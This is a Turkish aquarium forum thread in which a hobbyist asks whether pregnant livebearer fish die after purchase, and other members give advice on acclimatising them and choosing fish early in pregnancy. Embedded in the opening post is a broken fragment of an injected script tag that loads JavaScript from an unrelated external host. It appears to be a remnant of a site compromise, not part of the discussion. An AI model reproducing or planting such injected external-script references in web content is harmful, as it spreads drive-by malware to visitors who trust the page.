Balıkları Hamile Alınca Ölür mü?


Imperfectnest495Çevrim Dışı

Kayıt: 24/01/2012
İl: Diyarbakir
Mesaj: 574
Imperfectnest495Çevrim Dışı
Gönderim Zamanı: 18 Nisan 2014 06:14
  Merhaba Sevgili Hobidaşlarım;< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">
 Ben nisan ayı sonunda karma canlı doğuran tankı kuracağım.Akvaryumu nasıl kurmam gerektiğini biliyorum.10 yıllık hobiciyim ve çok araştırırım ... Neyse,
-Akvaryumcudan balığı aldığımızda ölüm riski bayağı fazlaymış.Bunu ben de yaşadım.Büyük ihtimalle doğrudur.Peki yeni hamile alsam da mı ölürler.Her tür için geçerli mi?
   Şimdiden teşekkür ederim.Sağlıklı hobiler ...

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

mineralÇevrim Dışı

Kayıt: 04/04/2014
İl: Eskisehir
Mesaj: 200
mineralÇevrim Dışı
Gönderim Zamanı: 18 Nisan 2014 06:38
Hamile yada hamile değil erkek dişi tür fark etmez alıştırma koşulları var onları yerine getirmen daha iyi olur. Kesin ölür diyede bir şey yok ama daha sağlıklı olur akvaryumunun suyuna alıştırıp akvaryuma eklemek.

Üye imzalarını sadece giriş yapan üyelerimiz görebilir

MertSoyumertÇevrim Dışı

Özel Üye
Kayıt: 14/11/2012
İl: Ankara
Mesaj: 2779
MertSoyumertÇevrim Dışı
Özel Üye
Gönderim Zamanı: 18 Nisan 2014 18:15
 Merhabalar, akvaryumculardan alınan balıklar genelde kötü bakım ve kalabalık yüzünden dirençsizdir. Zaten ömürlerinden bir parçayı orada bırakırlar. Kalabalık yüzünden gün yüzüne çıkmayan hastalıkları eve gelince yoldaki ısı değişimi ve stres yüzünden sizin akvaryumunuzda ortaya çıkar, hatta o balık bağışıklık kazandıysa sizin evinizdeki balıklara geçirip kendine bir şey olmayabilir. Ancak her halükarda benim kendi büyüttüğüm balıklar akvaryumculardan aldıklarımdan çok daha sağlıklı olmuştur hep, bu olay hobicilerden aldığınız balıklar için genel olarak geçerlidir.
Hamile alacaksanız hamileliğin en başındaki balıkları tercih edin. Stresten yavrular yolda ölü doğabiliyor, ya da hamile dişi zarar görebiliyor. Zaten içindeki yumurtaları beslemek için fazladan besin tüketen hamile balık bir de stresten birkaç gün yem yemeyebiliyor, bence hobiciden genç ve hamileliğim başında balıklar tercih edin. 
Sonuç olarak ölür ya da ölmez diye bir şey diyemeyiz, iyi alıştırılırsa yaşama şansı yüksek. Ancak uzun vadede benim akvaryumculardan aldığım balıklar kendi büyüttüklerime oranla daha fazla hasta oldular, ortalama boyda kaldılar. Akvaryumcularda kaldıkları süre onlar için kayıp gibi birşey oluyor yani. Hobici candır :D
Saussure2014-04-18 18:19:07

Üye imzalarını sadece giriş yapan üyelerimiz görebilir